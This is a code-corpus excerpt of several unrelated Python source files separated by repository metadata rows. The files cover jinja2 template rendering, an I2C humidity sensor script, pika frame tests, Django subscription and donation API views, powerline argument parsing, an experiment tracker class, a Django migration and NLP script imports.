# 1. Change working folder to ., so that jinja2 works ok
# 2. Files with name starts with # will be include for rendering, so NO need to render
# 3. Files with name ends with jinja2 will be render
#
o_base = os.path.abspath(o_base)
with work_in(o_base):
# Set jinja2's path
env.loader = FileSystemLoader('.')
o_context = {k: v for k, v in context.items() if not k.startswith('__')}
#
for i, o_name in enumerate(out_names):
if o_name.startswith('#') or not o_name.endswith('.jinja2'):
continue
#
o_file = o_name.replace('.jinja2', '')
logger.debug(f'render {o_file}')
# Remove __ so that object can be accessed in template
if out_values:
o_context[out_key[2:]] = out_values[i]
#
try:
tmpl = env.get_template(o_name)
except TemplateSyntaxError as exception:
exception.translated = False
raise
rendered = tmpl.render(**o_context)
#
with open(o_file, 'w', encoding='utf-8') as f:
f.write(rendered)
# Remove template file
os.remove(o_name)
def main(args: List[str]) -> bool:
""" Main. """
parser = argparse.ArgumentParser(prog="pyseed gen")
parser.add_argument(
"-m",
nargs='?',
metavar='models',
default='./models',
help="Specify the models folder, default value is ./models",
)
parser.add_argument(
"-s",
nargs='?',
metavar='seeds',
default='./seeds',
help="Specify the seeds folder, default value is ./seeds",
)
parser.add_argument(
"-o",
nargs='?',
metavar='output',
default='./grows',
help="Specify the generation output folder, default value is ./grows",
)
parser.add_argument(
"-t",
nargs='+',
metavar='templates',
help="Specify the templates",
)
parsed_args = parser.parse_args(args)
return _gen(parsed_args.m, parsed_args.s, parsed_args.o, parsed_args.t)
| 37.321429
| 112
| 0.536124
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,137
| 0.307237
|
366e02860b9652ab88acf006189e3756c87e9843
| 575
|
py
|
Python
|
logger/hum_test3.py
|
scsibug/Raspberry-Pi-Sensor-Node
|
606cf2a15a72ac1503c7318a39c9f3cc523a9c4a
|
[
"Unlicense"
] | 1
|
2015-12-23T04:27:16.000Z
|
2015-12-23T04:27:16.000Z
|
logger/hum_test3.py
|
scsibug/Raspberry-Pi-Sensor-Node
|
606cf2a15a72ac1503c7318a39c9f3cc523a9c4a
|
[
"Unlicense"
] | null | null | null |
logger/hum_test3.py
|
scsibug/Raspberry-Pi-Sensor-Node
|
606cf2a15a72ac1503c7318a39c9f3cc523a9c4a
|
[
"Unlicense"
] | null | null | null |
# this example came from http://www.raspberrypi.org/phpBB3/viewtopic.php?f=32&t=29454&sid=4543fbd8f48478644e608d741309c12b&start=25
import smbus
import time
b = smbus.SMBus(1)
d = []
addr = 0x27
b.write_quick(addr)
time.sleep(0.05)
d = b.read_i2c_block_data(addr, 0,4)
status = (d[0] & 0xc0) >> 6
humidity = (((d[0] & 0x3f) << 8) + d[1])*100/16383
tempC = ((d[2] << 6) + ((d[3] & 0xfc) >> 2))*165/16383 - 40
tempF = tempC*9/5 + 32
print "Data: ", "%02x "*len(d)%tuple(d)
print "Status: ", status
print "Humidity: ", humidity, "%"
print "Temperature:", tempF, "F"
| 31.944444
| 131
| 0.634783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 200
| 0.347826
|
366e485c9bc0322e636a5736840956b42775c986
| 4,493
|
py
|
Python
|
vendor/python-pika/tests/frame_tests.py
|
suthat/signal
|
9730f7ee1a3b00a65eb4d9a2cce4f3a5eee33451
|
[
"Apache-2.0"
] | 1
|
2018-09-02T22:28:56.000Z
|
2018-09-02T22:28:56.000Z
|
vendor/python-pika/tests/frame_tests.py
|
suthat/signal
|
9730f7ee1a3b00a65eb4d9a2cce4f3a5eee33451
|
[
"Apache-2.0"
] | null | null | null |
vendor/python-pika/tests/frame_tests.py
|
suthat/signal
|
9730f7ee1a3b00a65eb4d9a2cce4f3a5eee33451
|
[
"Apache-2.0"
] | null | null | null |
"""
Tests for pika.frame
"""
try:
import unittest2 as unittest
except ImportError:
import unittest
from pika import exceptions
from pika import frame
from pika import spec
class FrameTests(unittest.TestCase):
BASIC_ACK = ('\x01\x00\x01\x00\x00\x00\r\x00<\x00P\x00\x00\x00\x00\x00\x00'
'\x00d\x00\xce')
BODY_FRAME = '\x03\x00\x01\x00\x00\x00\x14I like it that sound\xce'
BODY_FRAME_VALUE = 'I like it that sound'
CONTENT_HEADER = ('\x02\x00\x01\x00\x00\x00\x0f\x00<\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00d\x10\x00\x02\xce')
HEARTBEAT = '\x08\x00\x00\x00\x00\x00\x00\xce'
PROTOCOL_HEADER = 'AMQP\x00\x00\t\x01'
def frame_marshal_not_implemented_test(self):
frame_obj = frame.Frame(0x000A000B, 1)
self.assertRaises(NotImplementedError, frame_obj.marshal)
def frame_underscore_marshal_test(self):
basic_ack = frame.Method(1, spec.Basic.Ack(100))
self.assertEqual(basic_ack.marshal(), self.BASIC_ACK)
def headers_marshal_test(self):
header = frame.Header(1, 100,
spec.BasicProperties(delivery_mode=2))
self.assertEqual(header.marshal(), self.CONTENT_HEADER)
def body_marshal_test(self):
body = frame.Body(1, 'I like it that sound')
self.assertEqual(body.marshal(), self.BODY_FRAME)
def heartbeat_marshal_test(self):
heartbeat = frame.Heartbeat()
self.assertEqual(heartbeat.marshal(), self.HEARTBEAT)
def protocol_header_marshal_test(self):
protocol_header = frame.ProtocolHeader()
self.assertEqual(protocol_header.marshal(), self.PROTOCOL_HEADER)
def decode_protocol_header_instance_test(self):
self.assertIsInstance(frame.decode_frame(self.PROTOCOL_HEADER)[1],
frame.ProtocolHeader)
def decode_protocol_header_bytes_test(self):
self.assertEqual(frame.decode_frame(self.PROTOCOL_HEADER)[0], 8)
def decode_method_frame_instance_test(self):
self.assertIsInstance(frame.decode_frame(self.BASIC_ACK)[1],
frame.Method)
def decode_protocol_header_failure_test(self):
self.assertEqual(frame.decode_frame('AMQPa'), (0, None))
def decode_method_frame_bytes_test(self):
self.assertEqual(frame.decode_frame(self.BASIC_ACK)[0], 21)
def decode_method_frame_method_test(self):
self.assertIsInstance(frame.decode_frame(self.BASIC_ACK)[1].method,
spec.Basic.Ack)
def decode_header_frame_instance_test(self):
self.assertIsInstance(frame.decode_frame(self.CONTENT_HEADER)[1],
frame.Header)
def decode_header_frame_bytes_test(self):
self.assertEqual(frame.decode_frame(self.CONTENT_HEADER)[0], 23)
def decode_header_frame_properties_test(self):
frame_value = frame.decode_frame(self.CONTENT_HEADER)[1]
self.assertIsInstance(frame_value.properties, spec.BasicProperties)
def decode_frame_decoding_failure_test(self):
self.assertEqual(frame.decode_frame('\x01\x00\x01\x00\x00\xce'),
(0, None))
def decode_frame_decoding_no_end_byte_test(self):
self.assertEqual(frame.decode_frame(self.BASIC_ACK[:-1]), (0, None))
def decode_frame_decoding_wrong_end_byte_test(self):
self.assertRaises(exceptions.InvalidFrameError,
frame.decode_frame,
self.BASIC_ACK[:-1] + 'A')
def decode_body_frame_instance_test(self):
self.assertIsInstance(frame.decode_frame(self.BODY_FRAME)[1],
frame.Body)
def decode_body_frame_fragment_test(self):
self.assertEqual(frame.decode_frame(self.BODY_FRAME)[1].fragment,
self.BODY_FRAME_VALUE)
def decode_body_frame_fragment_consumed_bytes_test(self):
self.assertEqual(frame.decode_frame(self.BODY_FRAME)[0], 28)
def decode_heartbeat_frame_test(self):
self.assertIsInstance(frame.decode_frame(self.HEARTBEAT)[1],
frame.Heartbeat)
def decode_heartbeat_frame_bytes_consumed_test(self):
self.assertEqual(frame.decode_frame(self.HEARTBEAT)[0], 8)
def decode_frame_invalid_frame_type_test(self):
self.assertRaises(exceptions.InvalidFrameError,
frame.decode_frame,
'\x09\x00\x00\x00\x00\x00\x00\xce')
| 38.401709
| 79
| 0.672157
| 4,308
| 0.958825
| 0
| 0
| 0
| 0
| 0
| 0
| 418
| 0.093034
|
366eb4dab94bf0dd50fb14aff2db308e9c7cde9d
| 15,266
|
py
|
Python
|
apps/users/views.py
|
RympeR/HypeFans
|
28c3712af47fec4df2fe3df43c6e0ad26302bcbc
|
[
"MIT"
] | null | null | null |
apps/users/views.py
|
RympeR/HypeFans
|
28c3712af47fec4df2fe3df43c6e0ad26302bcbc
|
[
"MIT"
] | null | null | null |
apps/users/views.py
|
RympeR/HypeFans
|
28c3712af47fec4df2fe3df43c6e0ad26302bcbc
|
[
"MIT"
] | 2
|
2021-05-20T10:43:17.000Z
|
2021-06-09T08:12:24.000Z
|
import logging
from datetime import datetime, timedelta
import requests
from core.utils.customClasses import UserFilter
from core.utils.default_responses import (api_accepted_202,
api_bad_request_400,
api_block_by_policy_451,
api_created_201,
api_payment_required_402)
from core.utils.func import REF_PERCANTAGE, create_ref_link
from django.contrib.auth import authenticate
from django.shortcuts import get_object_or_404
from rest_framework import generics, permissions
from rest_framework.authtoken.models import Token
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import UpdateModelMixin
from rest_framework.response import Response
from rest_framework.views import APIView
from apps.blog.models import PostAction, PostBought
from apps.blog.serializers import PostGetShortSerializers
from .models import *
from .serializers import *
class UserActivationView(APIView):
def get(self, request, uid, token):
protocol = 'https://' if request.is_secure() else 'http://'
web_url = protocol + request.get_host()
post_url = web_url + "/auth/users/activate/"
post_data = {'uid': uid, 'token': token}
result = requests.post(post_url, data=post_data)
content = result.text
return Response(content)
class UserMeRetrieveAPI(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserMeSerializer
def get_object(self):
return self.request.user
class UserRetrieveAPI(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserOwnProfileGetSerializer
def get_object(self):
return self.request.user
class UserSearchRetrieveAPI(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserShortRetrieveSeriliazer
filterset_class = UserFilter
class UserProfileRetrieveAPI(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserGetSerializer
def retrieve(self, request, username):
user = User.objects.get(username=username)
req_user = request.user
data_compare = request.GET.get('datetime', 0)
limit = request.GET.get('limit', 50)
offset = request.GET.get('offset', 0)
results = []
sub_check = True if Subscription.objects.filter(
target=user, source=req_user, end_date__gte=datetime.now()).exists() else False
sub_dict = {
'subscribed': sub_check
}
if data_compare == 0:
for post in user.user_post.filter(archived=False).order_by('-publication_date'):
post_data = PostGetShortSerializers(
instance=post, context={'request': request}).data
res_dict = {}
res_dict['post'] = post_data
if post.access_level == 1:
res_dict['post']['payed'] = (
True if PostBought.objects.filter(
post=post, user=user).exists() else False
)
else:
res_dict['post']['payed'] = sub_check
post_action_queryset = PostAction.objects.filter(
post=post, user=request.user)
if post_action_queryset.exists():
for action in post_action_queryset:
if action.like:
res_dict['post']['liked'] = True
res_dict['post']['like_id'] = action.pk
break
else:
res_dict['post']['liked'] = False
res_dict['post']['like_id'] = None
else:
res_dict['post']['liked'] = False
res_dict['post']['like_id'] = None
if request.user in post.favourites.all():
res_dict['post']['favourite'] = True
else:
res_dict['post']['favourite'] = False
results.append(res_dict)
return api_accepted_202({
**self.serializer_class(instance=user, context={'request': request}).data,
**{'posts': results[offset:limit+offset]},
**sub_dict
})
def get_serializer_context(self):
return {'request': self.request}
class UserCardListAPI(generics.ListAPIView):
serializer_class = CardGetSerializer
def get_queryset(self):
user = self.request.user
return Card.objects.filter(
user=user
)
class UserBlockedListAPI(generics.ListAPIView):
serializer_class = UserShortRetrieveSeriliazer
def get_queryset(self):
user = self.request.user
return user.blocked_users.all()
class UserSettingsRetrieveAPI(generics.RetrieveAPIView):
serializer_class = SettingsSerializer
queryset = User.objects.all()
def get_object(self):
return self.request.user
class UserLoginAPI(generics.GenericAPIView):
permission_classes = permissions.AllowAny,
serializer_class = UserCreationSerializer
def post(self, request):
email = request.data['email']
password = request.data['password']
user = authenticate(username=email, password=password)
if user is not None:
token, _ = Token.objects.get_or_create(user=user)
return api_created_201(
{
"auth_token": str(token)
}
)
else:
return api_bad_request_400(
{
"non_field_errors": [
"Невозможно войти с предоставленными учетными данными."
]
}
)
class UserCreateAPI(generics.GenericAPIView):
permission_classes = permissions.AllowAny,
serializer_class = UserCreationSerializer
def post(self, request):
try:
if request.data.get('referrer'):
ref_user = User.objects.get(pk=request.data['referrer'])
ref_user.repheral_users.add()
else:
ref_user = None
username = request.data['username']
user, created = User.objects.get_or_create(
email=request.data['email'],
username=username,
ref_link=create_ref_link(username),
referrer=ref_user
)
assert created, "Already exists"
user.set_password(request.data['password'])
ref_user.repheral_users.add(user)
user.save()
token, created = Token.objects.get_or_create(user=user)
return api_created_201(
{
"auth_token": str(token)
}
)
except Exception as e:
logging.error(e)
return api_block_by_policy_451({"info": "already exists"})
class UserAPI(generics.DestroyAPIView):
queryset = User.objects.all()
serializer_class = UserCreationSerializer
def get_object(self):
return self.request.user
class UserPartialUpdateAPI(GenericAPIView, UpdateModelMixin):
queryset = User.objects.all()
serializer_class = UserPartialSerializer
def get_object(self):
return self.request.user
def put(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
class CreateSubscriptioAPI(generics.CreateAPIView):
queryset = User.objects.all()
serializer_class = SubscriptionCreateSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
try:
serializer.is_valid(raise_exception=True)
except AssertionError:
return api_block_by_policy_451({"status": "not enought credits"})
self.perform_create(serializer)
return Response(serializer.data)
def get_serializer_context(self):
return {'request': self.request}
class UserSubscription(GenericAPIView):
queryset = User.objects.all()
serializer_class = SubscriptionCreateSerializer
def post(self, request, pk):
user = request.user
subscribe_target = get_object_or_404(User, pk=pk)
if user.credit_amount > subscribe_target.subscribtion_price:
user.my_subscribes.add(subscribe_target)
subscribe_target.fans_amount += 1
subscribe_target.earned_credits_amount += subscribe_target.subscribtion_price
subscribe_target.save()
referrer = subscribe_target.referrer
if referrer:
referrer.earned_credits_amount += subscribe_target.subscribtion_price * REF_PERCANTAGE
referrer.save()
user.save()
subscription_datetime = datetime.now()
Subscription.objects.create(
source=user,
target=subscribe_target,
start_date=subscription_datetime.timestamp(),
end_date=subscription_datetime + timedelta(
days=subscribe_target.subscribtion_duration
).timestamp()
).save()
return api_accepted_202(
{
"subscriber": user.pk,
"subscribed": subscribe_target.pk
}
)
return api_payment_required_402(
{
"need_to_pay": subscribe_target.subscribtion_price - user.credit_amount
}
)
class CardRetrieveAPI(generics.RetrieveAPIView):
queryset = Card.objects.all()
serializer_class = CardGetSerializer
class CardCreateAPI(generics.CreateAPIView):
queryset = Card.objects.all()
serializer_class = CardCreationSerializer
def get_serializer_context(self):
return {'request': self.request}
class CardAPI(generics.RetrieveUpdateDestroyAPIView):
queryset = Card.objects.all()
serializer_class = CardCreationSerializer
class CardPartialUpdateAPI(GenericAPIView, UpdateModelMixin):
queryset = Card.objects.all()
serializer_class = CardCreationSerializer
def put(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
class DonationRetrieveAPI(generics.RetrieveAPIView):
queryset = Donation.objects.all()
serializer_class = DonationGetSerializer
class AddBlockedUserAPI(generics.GenericAPIView):
permission_classes = (permissions.IsAuthenticated, )
queryset = User.objects.all()
serializer_class = UserBlockSerializer
def get_object(self):
return self.request.user
def put(self, request, *args, **kwargs):
user = User.objects.get(username=request.data['username'])
if request.data['block']:
self.request.user.blocked_users.add(user)
else:
self.request.user.blocked_users.remove(user)
self.request.user.save()
data = {
'user': user.pk,
'block': request.data['block']
}
return Response(data)
class DonationCreateAPI(generics.CreateAPIView):
queryset = Donation.objects.all()
serializer_class = DonationCreationSerializer
def get_serializer_context(self):
return {'request': self.request}
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
try:
serializer.is_valid(raise_exception=True)
except ValueError:
return api_block_by_policy_451({"status": "not enought credits"})
self.perform_create(serializer)
return Response(serializer.data)
def get_serializer_context(self):
return {'request': self.request}
class PaymentRetrieveAPI(generics.RetrieveAPIView):
queryset = Payment.objects.all()
serializer_class = PaymentGetSerializer
class PaymentCreateAPI(generics.CreateAPIView):
queryset = Payment.objects.all()
serializer_class = PaymentCreationSerializer
def get_serializer_context(self):
return {'request': self.request}
class PendingUserCreateAPI(generics.CreateAPIView):
queryset = PendingUser.objects.all()
serializer_class = PendingUserCreationSerializer
def get_object(self):
return self.request.user
class UserOnlineRetrieveAPI(generics.RetrieveAPIView):
queryset = UserOnline.objects.all()
serializer_class = UserOnlineGetSerializer
class UserOnlineCreateAPI(generics.GenericAPIView):
queryset = UserOnline.objects.all()
serializer_class = UserOnlineCreationSerializer
def get_serializer_context(self):
return {'request': self.request}
def post(self, request):
serializer = self.get_serializer(data=request.data)
try:
serializer.is_valid(raise_exception=True)
except AssertionError:
return api_bad_request_400({"status": "bad request"})
UserOnline.objects.create_or_update(
user=request.user
)
return Response(serializer.data)
class DonationPayedUserRetrieveAPI(generics.ListAPIView):
queryset = Donation.objects.all()
serializer_class = DonationGetSerializer
def get_queryset(self):
reciever = self.request.user
return Donation.objects.filter(
reciever=reciever
).order_by('-datetime')
class DonationPayedUserToRetrieveAPI(generics.ListAPIView):
queryset = Donation.objects.all()
serializer_class = DonationGetSerializer
def get_queryset(self):
sender = self.request.user
return Donation.objects.filter(
sender=sender
).order_by('-datetime')
class PaymentUserHistoryRetrieveAPI(generics.ListAPIView):
queryset = Payment.objects.all()
serializer_class = PaymentGetSerializer
def get_queryset(self):
sender = self.request.user
return Payment.objects.filter(
card__user=sender
).order_by('-datetime')
class PayStatsHistoryRetrieveAPI(APIView):
def get(self, request, *args,):
current_month = datetime.now().month
user = request.user
donations = Donation.objects.filter(
receiver=user,
datetime__datetime__date__month=current_month,
).order_by('-datetime')
donation_amount = sum((donation.amount for donation in donations))
subscriptions = Subscription.objects.filter(
target=user,
start_date__date__month=current_month,
).order_by('-start_date')
subscription_amount = sum((
user.subscribtion_duration
for _ in range(len(subscriptions))
))
result_sum = subscription_amount + donation_amount
result = {
'result_sum': result_sum,
'donations': DonationGetSerializer(
instance=donations,
many=True
).data,
'subscriptions': SubscriptionGetSerializer(
instance=subscriptions,
many=True
).data,
}
return Response(result)
| 32.971922
| 102
| 0.631796
| 14,185
| 0.926337
| 0
| 0
| 0
| 0
| 0
| 0
| 842
| 0.054986
|
366eba2a1a7b41a03aed067b028dd47e05783a38
| 7,102
|
py
|
Python
|
powerline/commands/main.py
|
OSunday/powerline
|
f6bf7b4916dc377a5ffe13caff171fbaa3ab02f6
|
[
"MIT"
] | 15
|
2017-10-02T06:09:07.000Z
|
2020-01-17T07:53:58.000Z
|
powerline/commands/main.py
|
OSunday/powerline
|
f6bf7b4916dc377a5ffe13caff171fbaa3ab02f6
|
[
"MIT"
] | null | null | null |
powerline/commands/main.py
|
OSunday/powerline
|
f6bf7b4916dc377a5ffe13caff171fbaa3ab02f6
|
[
"MIT"
] | 6
|
2017-10-03T15:48:12.000Z
|
2021-08-28T18:07:29.000Z
|
# vim:fileencoding=utf-8:noet
# WARNING: using unicode_literals causes errors in argparse
from __future__ import (division, absolute_import, print_function)
import argparse
import sys
from itertools import chain
from powerline.lib.overrides import parsedotval, parse_override_var
from powerline.lib.dict import mergeargs
from powerline.lib.encoding import get_preferred_arguments_encoding
from powerline.lib.unicode import u, unicode
from powerline.bindings.wm import wm_threads
if sys.version_info < (3,):
encoding = get_preferred_arguments_encoding()
def arg_to_unicode(s):
return unicode(s, encoding, 'replace') if not isinstance(s, unicode) else s # NOQA
else:
def arg_to_unicode(s):
return s
def finish_args(parser, environ, args, is_daemon=False):
'''Do some final transformations
Transforms ``*_override`` arguments into dictionaries, adding overrides from
environment variables. Transforms ``renderer_arg`` argument into dictionary
as well, but only if it is true.
:param dict environ:
Environment from which additional overrides should be taken from.
:param args:
Arguments object returned by
:py:meth:`argparse.ArgumentParser.parse_args`. Will be modified
in-place.
:return: Object received as second (``args``) argument.
'''
args.config_override = mergeargs(chain(
parse_override_var(environ.get('POWERLINE_CONFIG_OVERRIDES', '')),
(parsedotval(v) for v in args.config_override or ()),
))
args.theme_override = mergeargs(chain(
parse_override_var(environ.get('POWERLINE_THEME_OVERRIDES', '')),
(parsedotval(v) for v in args.theme_override or ()),
))
if args.renderer_arg:
args.renderer_arg = mergeargs((parsedotval(v) for v in args.renderer_arg), remove=True)
if 'pane_id' in args.renderer_arg:
if isinstance(args.renderer_arg['pane_id'], (bytes, unicode)):
try:
args.renderer_arg['pane_id'] = int(args.renderer_arg['pane_id'].lstrip(' %'))
except ValueError:
pass
if 'client_id' not in args.renderer_arg:
args.renderer_arg['client_id'] = args.renderer_arg['pane_id']
args.config_path = (
[path for path in environ.get('POWERLINE_CONFIG_PATHS', '').split(':') if path]
+ (args.config_path or [])
)
if args.ext[0].startswith('wm.'):
if not is_daemon:
parser.error('WM bindings must be used with daemon only')
elif args.ext[0][3:] not in wm_threads:
parser.error('WM binding not found')
elif not args.side:
parser.error('expected one argument')
return args
def int_or_sig(s):
if s.startswith('sig'):
return u(s)
else:
return int(s)
def get_argparser(ArgumentParser=argparse.ArgumentParser):
parser = ArgumentParser(description='Powerline prompt and statusline script.')
parser.add_argument(
'ext', nargs=1,
help='Extension: application for which powerline command is launched '
'(usually `shell\' or `tmux\'). Also supports `wm.\' extensions: '
+ ', '.join(('`wm.' + key + '\'' for key in wm_threads.keys())) + '.'
)
parser.add_argument(
'side', nargs='?', choices=('left', 'right', 'above', 'aboveleft'),
help='Side: `left\' and `right\' represent left and right side '
'respectively, `above\' emits lines that are supposed to be printed '
'just above the prompt and `aboveleft\' is like concatenating '
'`above\' with `left\' with the exception that only one Python '
'instance is used in this case. May be omitted for `wm.*\' extensions.'
)
parser.add_argument(
'-r', '--renderer-module', metavar='MODULE', type=str,
help='Renderer module. Usually something like `.bash\' or `.zsh\' '
'(with leading dot) which is `powerline.renderers.{ext}{MODULE}\', '
'may also be full module name (must contain at least one dot or '
'end with a dot in case it is top-level module) or '
'`powerline.renderers\' submodule (in case there are no dots).'
)
parser.add_argument(
'-w', '--width', type=int,
help='Maximum prompt with. Triggers truncation of some segments.'
)
parser.add_argument(
'--last-exit-code', metavar='INT', type=int_or_sig,
help='Last exit code.'
)
parser.add_argument(
'--last-pipe-status', metavar='LIST', default='',
type=lambda s: [int_or_sig(status) for status in s.split()],
help='Like above, but is supposed to contain space-separated array '
'of statuses, representing exit statuses of commands in one pipe.'
)
parser.add_argument(
'--jobnum', metavar='INT', type=int,
help='Number of jobs.'
)
parser.add_argument(
'-c', '--config-override', metavar='KEY.KEY=VALUE', type=arg_to_unicode,
action='append',
help='Configuration overrides for `config.json\'. Is translated to a '
'dictionary and merged with the dictionary obtained from actual '
'JSON configuration: KEY.KEY=VALUE is translated to '
'`{"KEY": {"KEY": VALUE}}\' and then merged recursively. '
'VALUE may be any JSON value, values that are not '
'`null\', `true\', `false\', start with digit, `{\', `[\' '
'are treated like strings. If VALUE is omitted '
'then corresponding key is removed.'
)
parser.add_argument(
'-t', '--theme-override', metavar='THEME.KEY.KEY=VALUE', type=arg_to_unicode,
action='append',
help='Like above, but theme-specific. THEME should point to '
'an existing and used theme to have any effect, but it is fine '
'to use any theme here.'
)
parser.add_argument(
'-R', '--renderer-arg',
metavar='KEY=VAL', type=arg_to_unicode, action='append',
help='Like above, but provides argument for renderer. Is supposed '
'to be used only by shell bindings to provide various data like '
'last-exit-code or last-pipe-status (they are not using '
'`--renderer-arg\' for historical resons: `--renderer-arg\' '
'was added later).'
)
parser.add_argument(
'-p', '--config-path', action='append', metavar='PATH',
help='Path to configuration directory. If it is present then '
'configuration files will only be seeked in the provided path. '
'May be provided multiple times to search in a list of directories.'
)
parser.add_argument(
'--socket', metavar='ADDRESS', type=str,
help='Socket address to use in daemon clients. Is always UNIX domain '
'socket on linux and file socket on Mac OS X. Not used here, '
'present only for compatibility with other powerline clients. '
'This argument must always be the first one and be in a form '
'`--socket ADDRESS\': no `=\' or short form allowed '
'(in other powerline clients, not here).'
)
return parser
def write_output(args, powerline, segment_info, write):
if args.renderer_arg:
segment_info.update(args.renderer_arg)
if args.side.startswith('above'):
for line in powerline.render_above_lines(
width=args.width,
segment_info=segment_info,
mode=segment_info.get('mode', None),
):
if line:
write(line + '\n')
args.side = args.side[len('above'):]
if args.side:
rendered = powerline.render(
width=args.width,
side=args.side,
segment_info=segment_info,
mode=segment_info.get('mode', None),
)
write(rendered)
| 37.183246
| 89
| 0.696987
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,660
| 0.515348
|
366f7150d8d059f7a7975d57fa08b372b8cccd5e
| 2,126
|
py
|
Python
|
hunter/mlops/experiments/experiment.py
|
akamlani/hunter-core
|
98b08b69fc460eb4cb75e67a36f86e80e03029bd
|
[
"MIT"
] | null | null | null |
hunter/mlops/experiments/experiment.py
|
akamlani/hunter-core
|
98b08b69fc460eb4cb75e67a36f86e80e03029bd
|
[
"MIT"
] | null | null | null |
hunter/mlops/experiments/experiment.py
|
akamlani/hunter-core
|
98b08b69fc460eb4cb75e67a36f86e80e03029bd
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
import time
import shutil
import logging
logger = logging.getLogger(__name__)
class Experiment(object):
"""Create experiment directory structure, track, and store data.
To be used as a base class or derived `Experiment` classes.
"""
def __init__(self, project_name:str, experiment_dir:str="dev-platform/experiments/snapshots", tags:list=None) -> None:
"""Initialize Experiment class instance.
Args:
project_name (str): Name of Project
experiment_dir (str, optional): Path of location to experiment snapshots
param3 (:obj:`list` of :obj:`str`): List of Tags to associate with experiment
"""
super().__init__()
# copy directory structure to project name
user_home = os.getenv("HOME")
experiment_dir = os.path.join(user_home, experiment_dir)
template_dir = os.path.join(experiment_dir, "template")
project_dir = os.path.join(experiment_dir, project_name)
self._project_dir = project_dir
self._export_dir = os.path.join(self._project_dir, "exports")
self._model_dir = os.path.join(self._export_dir, "artifacts")
self._copy_dir_template(template_dir, project_dir)
self._tags = {k: v for k,v in tags.items()}
self._name = project_name
self._id = -1
def list_project_dir(self):
print( os.listdir(self._project_dir) )
@property
def name(self):
return self._name
@property
def experiment_id(self):
return self._id
@property
def tags(self):
return self._tags
def add_data_uri(self, data_uri):
self.datasrc_uri = data_uri
def add_vocab_uri(self, vocab_uri):
self.vocabsrc_uri = vocab_uri
def _add_tag(self, tag):
self._tags[tag.key] = tag.value
def _copy_dir_template(self, src, dest):
if os.path.exists(dest):
shutil.rmtree(dest)
shutil.copytree(src, dest)
def __repr__(self):
return f"{self.name}"
| 27.973684
| 122
| 0.62841
| 2,009
| 0.944967
| 0
| 0
| 172
| 0.080903
| 0
| 0
| 561
| 0.263876
|
36708e40843ebac43aa8a9c519fbf7f8e02640d2
| 1,895
|
py
|
Python
|
blousebrothers/confs/migrations/0044_subscriptions_bonus.py
|
sladinji/blousebrothers
|
461de3ba011c0aaed3f0014136c4497b6890d086
|
[
"MIT"
] | 1
|
2022-01-27T11:58:10.000Z
|
2022-01-27T11:58:10.000Z
|
blousebrothers/confs/migrations/0044_subscriptions_bonus.py
|
sladinji/blousebrothers
|
461de3ba011c0aaed3f0014136c4497b6890d086
|
[
"MIT"
] | 5
|
2021-03-19T00:01:54.000Z
|
2022-03-11T23:46:21.000Z
|
blousebrothers/confs/migrations/0044_subscriptions_bonus.py
|
sladinji/blousebrothers
|
461de3ba011c0aaed3f0014136c4497b6890d086
|
[
"MIT"
] | null | null | null |
from django.db import migrations
from decimal import Decimal
from dateutil.relativedelta import relativedelta
from datetime import date
def fix_subscription(apps, schema_editor):
Subscription = apps.get_model('confs', 'Subscription')
SubscriptionType = apps.get_model('confs', 'SubscriptionType')
# update presale sub past due date
pdate = date.today() + relativedelta(months=+12)
Subscription.objects.all().update(date_over=pdate)
Subscription.objects.all().update(type_id=5)
SubscriptionType.objects.exclude(id=5).delete()
sub = SubscriptionType.objects.first()
if sub:
sub.bonus = Decimal('2')
sub.save()
else:
return
# Update Abo product type
Product = apps.get_model('catalogue', 'Product')
ProductAttribute = apps.get_model('catalogue', 'ProductAttribute')
ProductAttributeValue = apps.get_model('catalogue', 'ProductAttributeValue')
abo = Product.objects.filter(title__icontains='abo').get()
pclass = abo.product_class
bonus = ProductAttribute(name='bonus', code='bonus', type='text')
bonus.save()
email_msg = ProductAttribute(name='email_msg', code='email_msg', type='richtext')
email_msg.save()
bonus_sponsor = ProductAttribute(name='bonus_sponsor', code='bonus_sponsor', type='text')
bonus_sponsor.save()
pclass.attributes.add(bonus, email_msg, bonus_sponsor)
pclass.save()
#add a 2€ bonus attribute to presale subscription
mybonus = ProductAttributeValue(attribute=bonus, value_text='2.00', product=abo)
mybonus.save()
abo.attribute_values.add(mybonus)
abo.save()
class Migration(migrations.Migration):
dependencies = [
('confs', '0043_auto_20170206_0855'),
]
operations = [
# omit reverse_code=... if you don't want the migration to be reversible.
migrations.RunPython(fix_subscription),
]
| 32.118644
| 93
| 0.705013
| 268
| 0.141276
| 0
| 0
| 0
| 0
| 0
| 0
| 446
| 0.235108
|
367177f87916e9f31a627747b9f2f2e7f5f23e29
| 1,771
|
py
|
Python
|
NLP-Model/GraphGenerator.py
|
AdityaPrasadMishra/NLP--Project-Group-16
|
fb62cc6a1db4a494058171f11c14a2be3933a9a1
|
[
"MIT"
] | null | null | null |
NLP-Model/GraphGenerator.py
|
AdityaPrasadMishra/NLP--Project-Group-16
|
fb62cc6a1db4a494058171f11c14a2be3933a9a1
|
[
"MIT"
] | null | null | null |
NLP-Model/GraphGenerator.py
|
AdityaPrasadMishra/NLP--Project-Group-16
|
fb62cc6a1db4a494058171f11c14a2be3933a9a1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 24 22:03:42 2018
@author: aditya
"""
import codecs
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import re
import time
import random
